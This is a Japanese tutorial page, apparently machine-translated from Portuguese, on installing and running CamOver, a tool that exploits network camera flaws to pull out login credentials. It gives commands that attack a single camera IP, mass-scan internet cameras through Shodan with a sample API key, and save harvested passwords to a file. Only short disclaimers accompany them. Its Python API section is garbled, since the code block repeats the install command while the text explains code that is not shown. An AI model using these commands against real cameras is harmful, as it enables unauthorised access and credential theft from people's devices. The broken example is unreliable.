ホームページ > バックエンド開発 > Python チュートリアル > CamOver — ネットワーク カメラの脆弱性を悪用するツール

CamOver — ネットワーク カメラの脆弱性を悪用するツール

Mary-Kate Olsen
リリース: 2024-11-23 05:40:33
オリジナル
1000 人が閲覧しました

CamOver — ferramenta para exploração de vulnerabilidades em câmeras de rede

今日は、ネットワーク カメラの脆弱性を悪用し、パスワードを取得し、さまざまな種類の攻撃を実行するために使用される興味深いツールである CamOver について説明します。攻撃は、CCTV、GoAhead、Netwave などの一般的なカメラ モデルの脆弱性を悪用して行われます。以下にCamOverのインストール方法と使い方を詳しく説明します。


CamOver を使用したネットワーク カメラのハッキング

この記事は教育目的および倫理的ハッキングの学習のみを目的としています。ネットワークカメラへの不正アクセスは違法であり、犯罪とみなされます。ウェブサイト spy-soft.net も作成者も、あなたの行動に対して責任を負いません。

カムオーバー機能:

  • 一般的なネットワーク カメラ モデル (CCTV、GoAhead、Netwave) の脆弱性の悪用。
  • マルチスレッド機能により、複数のカメラを同時にサポートします。
  • コマンドラインまたは API 経由で使用できるフレンドリーなインターフェイス。

CamOver のインストール

ツールをインストールするには、次のコマンドを使用するだけです:

pip3 install git+https://github.com/EntySec/CamOver
ログイン後にコピー
ログイン後にコピー

CamOver の使用

インストール後、次のコマンドを使用して CamOver を起動します。

camover
ログイン後にコピー

CamOver の開始時に使用可能なパラメータ:

-h, --help            Exibe a mensagem de ajuda e sai.  
-t, --threads         Usa multithreading para acelerar o processo.  
-o OUTPUT, --output OUTPUT  Salva os resultados em um arquivo.  
-i INPUT, --input INPUT  Arquivo com endereços das câmeras.  
-a ADDRESS, --address ADDRESS  Um único endereço de câmera.  
--shodan SHODAN       Chave de API do Shodan para explorar câmeras pela internet.  
--zoomeye ZOOMEYE     Chave de API do ZoomEye para explorar câmeras pela internet.  
-p PAGES, --pages PAGES  Número de páginas a ser buscado no ZoomEye.  
ログイン後にコピー

使用例:

単一カメラの探索

IP アドレス 192.168.99.100 のカメラがあるとします。悪用できるかどうかを確認するには、次のコマンドを実行します:

camover -a 192.168.99.100
ログイン後にコピー

インターネット経由でカメラを探索する

Shodan を使用してオンラインでカメラを検索するには、次のコマンドを実行します:

camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
ログイン後にコピー

Shodan API キー (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) は例として提供されています。これまたは独自のキーを使用できます。


ファイルからカメラを探索する

camera.txt というファイルにカメラ アドレスのリストがある場合は、それらを調べて、取得したパスワードをpasswords.txt に保存することができます。

camover -t -i cameras.txt -o passwords.txt
ログイン後にコピー

API の使用法

CamOver は、ツールをコードに統合するための Python API も提供します。以下の例は、CamOver オブジェクトを作成し、IP でカメラを探索し、取得した資格情報を表示する方法を示しています。

pip3 install git+https://github.com/EntySec/CamOver
ログイン後にコピー
ログイン後にコピー

コードの説明:

  1. from camover import CamOver: ライブラリから CamOver クラスをインポートします。
  2. camover = CamOver(): CamOver オブジェクトを作成してそのメソッドにアクセスします。
  3. creds = camover.exploit('192.168.99.100'): エクスプロイト メソッドを使用して、IP アドレス 192.168.99.100 によるカメラの悪用を試みます。成功すると、カメラの資格情報 (ログインとパスワード) が返されます。
  4. print(creds): 取得した認証情報を表示します。

結論

CamOver は、ネットワーク カメラの脆弱性を悪用するための強力なツールです。このトピックに興味がある場合は、ネットワーク セキュリティと侵入テストについて学ぶための貴重なリソースとなる可能性があります。


⚠️ 免責事項: 許可されていない活動に CamOver などのツールを使用することは犯罪であり、重大な罰則が科される可能性があります。この情報は、法的および倫理的な目的にのみ使用してください。

以上がCamOver — ネットワーク カメラの脆弱性を悪用するツールの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

ソース:dev.to
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート